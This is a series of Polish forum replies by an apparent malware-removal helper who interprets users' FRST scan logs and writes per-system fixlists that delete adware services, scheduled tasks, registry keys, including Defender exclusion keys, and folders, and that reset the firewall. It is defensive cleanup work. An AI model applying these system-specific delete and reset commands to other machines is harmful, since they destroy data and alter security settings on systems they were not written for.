--load-extension="C:\Users\Przemek\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://navsmart.info ShortcutWithArgument: C:\Users\Przemek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://navsmart.info ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Przemek\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://navsmart.info ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Przemek\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" FirewallRules: [{69CAB555-BA9E-4731-882F-DFC2126E450D}] => (Allow) C:\Users\Przemek\AppData\Local\Temp\is-64H6C.tmp\download\MiniThunderPlatform.exe FirewallRules: [{4235CDA7-3945-4CBF-8977-ED1CA8A03CB9}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe FirewallRules: [{F3741A6B-EAC4-4B83-9F15-2D7A76B913E6}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe FirewallRules: [{4F15D172-C36B-4CCC-AB50-FC685F80901D}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\Downloader\download\MiniThunderPlatform.exe HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\75420476.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\75420476.sys => ""="Driver" DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Microsoft\Microsoft Antimalware DeleteKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Program Files (x86)\Temp C:\ProgramData\mntemp C:\ProgramData\AVAST Software C:\ProgramData\Avg C:\ProgramData\Avira C:\ProgramData\IObit C:\ProgramData\ProductData C:\ProgramData\Thunder Network C:\ProgramData\UniqueId C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ttwifi C:\ProgramData\Microsoft\Windows\Start Menu\Programs\鲁大师 C:\Users\Przemek\AppData\Local\Ckotoghzunle C:\Users\Przemek\AppData\Local\Tempfolder C:\Users\Przemek\AppData\Local\UCBrowser C:\Users\Przemek\AppData\Local\Zemana C:\Users\Przemek\AppData\LocalLow\Company C:\Users\Przemek\AppData\LocalLow\IObit C:\Users\Przemek\AppData\LocalLow\Octogear Games C:\Users\Przemek\AppData\Roaming\agent.dat C:\Users\Przemek\AppData\Roaming\Installer.dat C:\Users\Przemek\AppData\Roaming\Main.dat C:\Users\Przemek\AppData\Roaming\Adobe C:\Users\Przemek\AppData\Roaming\Hemkajdoa C:\Users\Przemek\AppData\Roaming\IObit C:\Users\Przemek\AppData\Roaming\KuaiZip C:\Users\Przemek\AppData\Roaming\Ludashi C:\Users\Przemek\AppData\Roaming\Macromedia C:\Users\Przemek\AppData\Roaming\Mozilla C:\Users\Przemek\AppData\Roaming\Origin C:\Users\Przemek\AppData\Roaming\Softlink C:\Users\Przemek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\UC浏览器.lnk C:\Users\Przemek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\UC浏览器.lnk C:\Users\Przemek\AppData\Roaming\Microsoft\Windows\Start Menu\¿ìÑ1.lnk C:\Users\Przemek\AppData\Roaming\Microsoft\Windows\Start Menu\¿ìѹ.lnk C:\Users\Przemek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UC浏览器 C:\Users\Przemek\Downloads\*.crdownload C:\Users\Public\Thunder Network C:\Windows\libcurl-4.dll C:\Windows\libeay32.dll C:\Windows\libwinpthread-1.dll C:\Windows\Azart C:\Windows\IObit C:\Windows\system32\Drivers\KuaiZipDrive.sys C:\Windows\system32\Drivers\KuaiZipDrive2.sys C:\Windows\system32\Drivers\ucguard.sys C:\Windows\SysWOW64\atrc.dll C:\Windows\SysWOW64\authmgr.dll C:\Windows\SysWOW64\clntxres.dll C:\Windows\SysWOW64\colorcvt.dll C:\Windows\SysWOW64\cook.dll C:\Windows\SysWOW64\drv1.dll C:\Windows\SysWOW64\drv2.dll C:\Windows\SysWOW64\drvc.dll C:\Windows\SysWOW64\GameCenter.exe.config C:\Windows\SysWOW64\GameXP.exe.config C:\Windows\SysWOW64\MUpdater.exe.config C:\Windows\SysWOW64\pncrt.dll C:\Windows\SysWOW64\pnen3260.dll C:\Windows\SysWOW64\raac.dll C:\Windows\SysWOW64\ramfformat.dll C:\Windows\SysWOW64\ramrender.dll C:\Windows\SysWOW64\rarender.dll C:\Windows\SysWOW64\rmfformat.dll C:\Windows\SysWOW64\rv10.dll C:\Windows\SysWOW64\rv20.dll C:\Windows\SysWOW64\rv30.dll C:\Windows\SysWOW64\rv40.dll C:\Windows\SysWOW64\rvrender.dll C:\Windows\SysWOW64\sipr.dll C:\Windows\SysWOW64\smplfsys.dll C:\Windows\SysWOW64\vidsite.dll C:\Windows\SysWOW64\vp6vfw.dll C:\Windows\SysWOW64\Drivers\HWiNFO64A.SYS EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z menu Notatnika > Plik > Zapisz jako > wprowadź nazwę fixlist.txt > Kodowanie zmień na UTF-8 Plik fixlist.txt umieść w folderze z którego uruchamiasz FRST. Przejdź w Tryb awaryjny Windows. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu, opuść Tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome jest ustawiony jako domyśny profil adware (nazwa na dysku ChromeDefaultData, ale w opcjach prawdopodobnie user0). Wymagana całkowita zmiana profilu. Menu Ustawienia > karta Ustawienia > Osoby: - Jeśli widać tylko jeden profil, Dodaj nową osobę i uruchom Chrome z poziomu tego profilu, a okno poprzedniego zamknij. Następnie w ustawieniach skasuj poprzedni profil. - Jeśli jednak widać dwa, przełącz się na ten poprzedni, a user0 skasuj. 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition ale już bez Shortcut. Dołącz też plik fixlog.txt.

Podaj które programy masz na myśli, niestety każda z akcji zmienia postać raportów FRST i trzeba dostarczyć świeże ponownie. Podmień załączniki w poście powyżej.

Temat przenoszę do działu Windows, brak związku z malware. Wg pierwszych raportów FRST jedna z ostatnich grubszych wagowo instalacji to sterowniki nVidia: ==================== Jeden miesiąc - utworzone pliki i foldery ======== 2016-08-13 21:55 - 2016-08-21 15:45 - 00001386 _____ C:\Users\Public\Desktop\GeForce Experience.lnk 2016-08-13 21:14 - 2016-08-13 21:14 - 00000000 ____D C:\Windows\SysWOW64\NV 2016-08-13 21:14 - 2016-08-13 21:14 - 00000000 ____D C:\Windows\system32\NV 2016-08-13 21:14 - 2016-04-16 00:53 - 00130328 _____ C:\Windows\SysWOW64\vulkan-1.dll 2016-08-13 21:14 - 2016-04-16 00:53 - 00040216 _____ C:\Windows\SysWOW64\vulkaninfo.exe 2016-08-13 21:14 - 2016-04-16 00:52 - 00130840 _____ C:\Windows\system32\vulkan-1.dll 2016-08-13 21:14 - 2016-04-16 00:52 - 00045336 _____ C:\Windows\system32\vulkaninfo.exe 2016-08-13 21:11 - 2016-04-27 16:35 - 42923576 _____ C:\Windows\system32\nvcompiler.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 37567424 _____ C:\Windows\SysWOW64\nvcompiler.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 31558080 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 25322552 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 21355760 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 20897608 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 19007480 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 17749736 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 17343096 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 17248216 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 16450472 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 14129544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 12539960 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys 2016-08-13 21:11 - 2016-04-27 16:35 - 10550736 _____ C:\Windows\system32\nvptxJitCompiler.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 08659472 _____ C:\Windows\SysWOW64\nvptxJitCompiler.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 03714472 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 03235896 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 02810936 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 01924152 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6436510.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 01571776 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6436510.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 00957888 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 00889400 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 00751552 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 00694208 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 00678704 _____ C:\Windows\system32\nvfatbinaryLoader.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 00571912 _____ C:\Windows\SysWOW64\nvfatbinaryLoader.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 00151368 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 00129024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll 2016-08-13 21:11 - 2016-04-27 16:35 - 00038336 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvpciflt.sys 2016-08-13 21:11 - 2016-04-27 16:35 - 00000139 _____ C:\Windows\SysWOW64\nv-vk32.json 2016-08-13 21:11 - 2016-04-27 16:35 - 00000139 _____ C:\Windows\system32\nv-vk64.json Oba dostarczone pliki DMP pokazują kontekst sterownika nVidia nvlddmkm.sys: Jeżeli BSOD zaczęły się po aktualizacji sterowników, nasuwa się by zacząć od przywrócenia ich poprzedniej wersji.

W tym systemie brak oznak infekcji, do korekty byłby tylko drobne odpadkowe wpisy, ale nie ma to znaczenia i potem się tym zajmę. Dostarcz więc logi z laptopa: Jeśli i na nim nie będzie oznak infekcji, problemem może być IP jakie obecnie jest przypisane (mogło być w użyciu wcześniej):

Użyłeś potwornie stary FRST, pozbawiony masy poprawek i detekcji: Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-05-2015 (ATTENTION: ====> FRST version is 504 days old and could be outdated) Najnowsza wersja jest z dzisiaj. Proszę pobierz najnowszy z przyklejonego i zrób nowe logi (wszystkie trzy): KLIK.

Nie polecam żadnych chińskich przeglądarek (Baidu, UCBrowser i pochodne). Problem z nimi polega m.in. na instalacjach niepożądanych PUP oraz kwestiach prywatności. Opisz na czym polega problem z Flash w Chrome, jak wygląda to "niedziałanie" i na jakich stronach. I jeszcze dodam, że Flash to technologia wymierająca (obecnie jest tendencja do przełączania na HTML5) oraz będąca pożywką dla infekcji. Już za niedługo w Chrome zostanie domyślnie zdeaktywowany (będzie się zgłaszał monit na stronach które nie obsługują jeszcze metodologii HTML5, by włączyć wtyczkę). Ja nadal widzę Baidu PC Faster na liście zainstalowanych oraz w uruchomionych procesach. Wstępne działania: 1. Spróbuj ponownie odinstalować Baidu PC Faster. Tu instrukcje jak wyglądają dialogi: KLIK. Nie wiem tylko czy pasuje to do opcji wersji, która zainstalowała się u Ciebie. 2. Do deinstalacji także stare programy i zbędne instalacje: Adobe Download Assistant, Adobe Flash Player ActiveX, Adobe Help Manager, Adobe Media Player, Adobe Shockwave Player 12.2, Apple Software Update, DivX Pro ĘÓƵ±ŕ˝âÂëĆ÷, Intel Security True Key (prawdopodobnie instalacja sponsorowana, weszła przez nieuważne instalowanie Adobe Flash), Java 8 Update 65, Obsługa programów Apple, QuickTime 7 (cały majdan Apple musi być odinstalowany ze względów bezpieczeństwa), Real Alternative 2.0.2, RealPlayer, SpyHunter 4 (lewy niepożądany skaner), Xvid MPEG-4 Video Codec, Xvid Video Codec. 3. Niezależnie od tego czy powiedzie się deinstalacja SpyHunter, zastosuj po niej także SpyHunterCleaner. 4. Zrób nowe logi FRST z opcji Skanuj (Scan), ponownie z Addition i Shortcut. Na ich poodstawie będzie doczyszczanie tego co pozostanie.

Nie widzę w raportach jawnej infekcji powiązanej z objawami. Jedyne co mnie zastanawia, to te zadania w Harmonogramie jakoby od instalacji Mashed, gdyż pierwsze z nich jest opisane ni w pięć ni w dziesięć jako "DELL". Nie mam jednak instalacji Mashed do porównania czy to poprawne obiekty. Czy na pewno zaznaczyłeś opcję Pokaż procesy wszystkich użytkowników? Podaj wyciąg ze skanera gdzie on widzi to zagrożenie, w jakiej ścieżce dostępu. Do detekcji BrowseFox pasuje poniższy obiekt, ale to już martwa usługa (nie uruchamia się i na 100% nie ma związku z objawami). S2 Update SourceApp; "C:\Program Files (x86)\SourceApp\updateSourceApp.exe" [X] Póki co, zadaję tylko doczyszczanie szczątków adware oraz wpisów pustych (w tym puste skróty z Shortcut.txt). Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: S2 Update SourceApp; "C:\Program Files (x86)\SourceApp\updateSourceApp.exe" [X] S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S3 xhunter1; \??\C:\Windows\xhunter1.sys [X] Task: {02094454-8734-4B26-8AFA-19742FD12F6A} - System32\Tasks\QtraxPlayer => 797711452.portal.qtrax.com Task: {32E22547-BAB7-4DB1-9955-83EAEEFE1ED4} - System32\Tasks\{989A7028-98D9-43A8-83B5-E15CFB182410} => pcalua.exe -a "D:\Program Files (x86)\The Vanishing of Ethan Carter\Binaries\Launcher.exe" -d "D:\Program Files (x86)\The Vanishing of Ethan Carter\Binaries" Task: {5CB4B241-4A96-4F3D-8418-02A2187A3F3A} - System32\Tasks\{E70AC7E4-7968-43A2-867E-70FB0B0C2061} => pcalua.exe -a C:\Users\user\AppData\Local\Temp\jre-8u77-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 Task: {E64CF221-96CD-40FF-94ED-E025906E2067} - System32\Tasks\{19AC2C04-E99E-41AD-833E-7E375430D87E} => pcalua.exe -a D:\Flak\InstallFilter.exe -d D:\Flak GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [brak pliku] FF Plugin-x32: @esn/npbattlelog,version=2.4.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll [brak pliku] FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [brak pliku] FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [brak pliku] FF user.js: detected! => C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\19zl9cwy.default-1410599145989\user.js [2014-12-01] FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files (x86)\mozilla firefox\plugins C:\ProgramData\mntemp C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Aspyr Media, Inc C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battlefield 4 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bound By Flame C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Desura C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FTL Faster Than Light C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gone Home PL [bDIP] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Haali Media Splitter C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kerbal Space Program C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NSR-Stage 1 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlast PL [bDIP] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\State of Decay C:\ProgramData\Microsoft\Windows\Start Menu\Programs\thechineseroom C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TmUnitedForever C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TrackMania 2 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ubisoft\Blue Byte C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zombie Studios C:\Users\user\AppData\Local\{737D343D-1987-4303-98C9-611F85351516} C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\1-click run C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Duel of Champions Launcher C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ElcomSoft C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Miner Wars 2081 C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PlagueInc 1.0 C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Spelunky HD 1.0 C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Binding of Isaac C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Swapper 1.0 C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Thomas Was Alone C:\Users\user\Desktop\Nazwa nie wymagana\Banished 64-bit.lnk C:\Users\user\Desktop\Nazwa nie wymagana\Battlefield 4(64 bit).lnk C:\Users\user\Desktop\Nazwa nie wymagana\Battlefield 4.lnk C:\Users\user\Desktop\Nazwa nie wymagana\Dead Space.lnk C:\Users\user\Desktop\Nazwa nie wymagana\Death Track Resurrection.lnk C:\Users\user\Desktop\Nazwa nie wymagana\Duel of Champions Launcher.lnk C:\Users\user\Desktop\Nazwa nie wymagana\Miasmata.lnk C:\Users\user\Desktop\Nazwa nie wymagana\PIT Projekt 2013.lnk C:\Users\user\Desktop\Nazwa nie wymagana\Play Outlast.lnk C:\Users\user\Desktop\Nazwa nie wymagana\Play Thief.lnk C:\Users\user\Desktop\Nazwa nie wymagana\Reus.lnk C:\Users\user\Desktop\Nazwa nie wymagana\Sir, You Are Being Hunted.lnk C:\Users\user\Desktop\Nazwa nie wymagana\The Darkness II.lnk C:\Users\user\Desktop\Nazwa nie wymagana\The Evil Within.lnk C:\Users\user\Desktop\Nazwa nie wymagana\The Forest.lnk C:\Users\user\Desktop\Nazwa nie wymagana\The Last Door.lnk C:\Users\user\Desktop\Resztki\TrackMania 2.lnk C:\Users\user\Desktop\Resztki\mcdungeon-v0.14.0-win64\Battlefield 4(64 bit).lnk C:\Users\user\Links\bmp.lnk C:\Users\Iwona\Desktop\dokumenty\Skrót do Iwona.lnk CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw ten plik.

Miałeś dostarczyć log ze skanu Hitman. Trudno powiedzieć co on widział w DT. A LEGACY_CHERIMOYA to wpis odpadkowy po adware. Tak, wygląda to na problem synchronizacji. Czyli zresetuj synchronizację: Otwórz Panel Google i na dole kliknij Resetuj synchronizację. Po tej akcji powtórz poprzednio zadane czyszczenie na poziomie lokalnym: Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń wszystkie adresy z wyjątkiem google.pl. Jeśli odinstalujesz wszystko, zrób nowe logi FRST.txt + Addition.txt, które zdowodują czy określone elementy zostały usunięte.

To adware/malware Win32/Suweezy, nabyte z jakiegoś "downloadera". Procesy są uruchamiane poprzez usługi, malware także wyklucza się samoistnie ze skanów. RegHunter to brat SpyHunter, program niepożądany! Masz na myśli jakieś skutki uboczne? Z FRST mogę tylko tyle się domyślić, że prawdopodobnie skasowałeś pliki licencji Windows, gdyż są oznaczone jako nowo utworzone: 2016-09-16 19:27 - 2016-09-16 19:52 - 00001184 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2016-09-16 19:27 - 2016-09-16 19:52 - 00001184 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj RegHunter. Być może będzie jakiś błąd, gdyż nstalacja już wygląda na naruszoną. Jeśli byłyby jakieś problemy z deinstalacją, wypróbuj Program Install and Uninstall Troubleshooter. Konsekwentnie na liście jest też Ace Stream Media 3.0.12, ale o tym już mówiliśmy wcześniej: KLIK. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 CfHelper33; D:\Program Files\MSUser.Default\Help_3\CfHelp33.exe [190980 2016-09-13] () [Brak podpisu cyfrowego] R2 CfHelper44; D:\Program Files\MSUser.Default\Help_4\CfHelp44.exe [190980 2016-09-13] () [Brak podpisu cyfrowego] R2 CfHelper55; D:\Program Files\MSUser.Default\Help_5\CfHelp55.exe [190980 2016-09-13] () [Brak podpisu cyfrowego] R2 CfHelper66; D:\Program Files\MSUser.Default\Help_6\CfHelp66.exe [190980 2016-09-13] () [Brak podpisu cyfrowego] R2 CleberchponushConfiguration; C:\Program Files (x86)\Phersercultsiergh\GrkDbg.dll [309760 2016-09-13] () [Brak podpisu cyfrowego] R2 SoSoIm3; C:\Program Files (x86)\SoSoIm_3\SoSoIm3.exe [190980 2016-09-13] () [Brak podpisu cyfrowego] R2 SoSoIm4; C:\Program Files (x86)\SoSoIm_4\SoSoIm4.exe [190980 2016-09-13] () [Brak podpisu cyfrowego] R2 SoSoIm5; C:\Program Files (x86)\SoSoIm_5\SoSoIm5.exe [190980 2016-09-13] () [Brak podpisu cyfrowego] R2 SoSoIm6; C:\Program Files (x86)\SoSoIm_6\SoSoIm6.exe [190980 2016-09-13] () [Brak podpisu cyfrowego] R2 winsaber; C:\Program Files (x86)\WinSaber\WinSaber.exe [521496 2016-09-14] () S3 dbx; system32\DRIVERS\dbx.sys [X] Task: {376F02DD-27A5-4FBB-A057-3A3AB5150115} - System32\Tasks\UnregisterNonABICompliantCodeRange => Wscript.exe C:\Program Files (x86)\joasnalx\obkmc.js Task: {4626D902-60FD-4596-B5EE-13B395B22CAA} - System32\Tasks\SafeZone scheduled Autoupdate 1474044924 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe Task: {861C3340-B9CF-47A1-A787-B35A45A9549C} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-09-16] (AVAST Software) Task: {C40DE0C9-0534-40BC-9A06-EA01960AF256} - System32\Tasks\RegHunterStartup => C:\Program Files\Enigma Software Group\RegHunter\RegHunter.exe Task: {DCC7DA10-06F7-4826-9AB1-B3334579CEAD} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe Task: {DCD85BC6-3D4D-4852-9386-D9E6A34D5DE4} - System32\Tasks\Cleberchponush Configuration => C:\Program Files (x86)\Phersercultsiergh\cludogh.exe [2016-09-13] (Kunshan Aunbox software co.,Ltd) ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Brak pliku HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> DeleteKey: HKCU\Software\Google\Chrome\Extensions DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKCU\Software\Mozilla\Firefox\Extensions DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Microsoft\Microsoft Antimalware DeleteKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVAST Software C:\Program Files\Common Files\AV\avast! Antivirus C:\Program Files (x86)\253ksrvi C:\Program Files (x86)\joasnalx C:\Program Files (x86)\Phersercultsiergh C:\Program Files (x86)\SoSoIm_3 C:\Program Files (x86)\SoSoIm_4 C:\Program Files (x86)\SoSoIm_5 C:\Program Files (x86)\SoSoIm_6 C:\Program Files (x86)\uojtfl8n C:\Program Files (x86)\WinSaber C:\ProgramData\AVAST Software C:\ProgramData\Avg C:\ProgramData\Avira C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip C:\Users\Karol\AppData\Local\{E7BEFFDD-3489-42AA-914B-3D8A129A5F89} C:\Users\Karol\AppData\Local\{74A7644F-F837-415B-A597-54A1B7F39AC5} C:\Users\Karol\AppData\Local\ACCCx3_7_5_291.zip.aamdownload C:\Users\Karol\AppData\Local\ACCCx3_7_5_291.zip.aamdownload.aamd C:\Users\Karol\AppData\Local\BITE502.tmp C:\Users\Karol\AppData\Local\BITFA74.tmp C:\Users\Karol\AppData\Roaming\eCyber C:\Users\Karol\AppData\Roaming\Enigma Software Group C:\Users\Karol\AppData\Roaming\WinZiper C:\Users\Karol\AppData\Roaming\Youtube Downloader HD C:\Users\Karol\AppData\Roaming\Mozilla\Firefox\Profiles\hfwuh2et.default-1466016864130\searchplugins\vaidylcl.xml C:\Users\Karol\Desktop\RegHunter.lnk C:\Users\Karol\Downloads\RegHunter-Installer.exe C:\Users\Karol\Start Menu\Programs\RegHunter C:\Windows\Joberphlusisp C:\Windows\System32\Tasks\AVAST Software EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W Google Chrome jest ustawiony jako domyśny profil adware (nazwa na dysku ChromeDefaultData, ale w opcjach prawdopodobnie user0). Wymagana całkowita zmiana profilu. Menu Ustawienia > kata Ustawienia > Osoby > Dodaj nową osobę i uruchom Chrome z poziomu tego profilu, a okno poprzedniego zamknij. Następnie w ustawieniach skasuj poprzedni profil. 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition ale już bez Shortcut. Dołącz też plik fixlog.txt.

Operacje związane z czyszczeniem systemu: Zabrakło trzeciego obowiązkowego pliku FRST Shortcut.txt. I wg moich przewidywań jest nadal czym się zajmować (m.in. aktywne usługi adware, zainfekowane DNS systemu). Działania pod kątem czyszczenia systemu z infekcji i szczątków programów: 1. Deinstalacje: - Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj Ace Stream Media 3.1.6 (wbudowane adware), DivX Setup (stary program), Simple Adblock (to wygląda na podróbkę adware). - Uruchom Program Install and Uninstall Troubleshooter i za jego pomocą usuń odpadkowy wpis ZoneAlarm Antivirus. - Uruchom Kaspersky Remover pod kątem usunięcia szczątków po odinstalowanym antywirusie ZoneAlarm (na silniku Kasperskiego, stąd narzędzie Kasperskiego). 2. Otwórz Notatnik i wklej w nim: CreateRestorePoint: () D:\Program Files\MSUser.Default\Help_4\CfHelp44.exe () 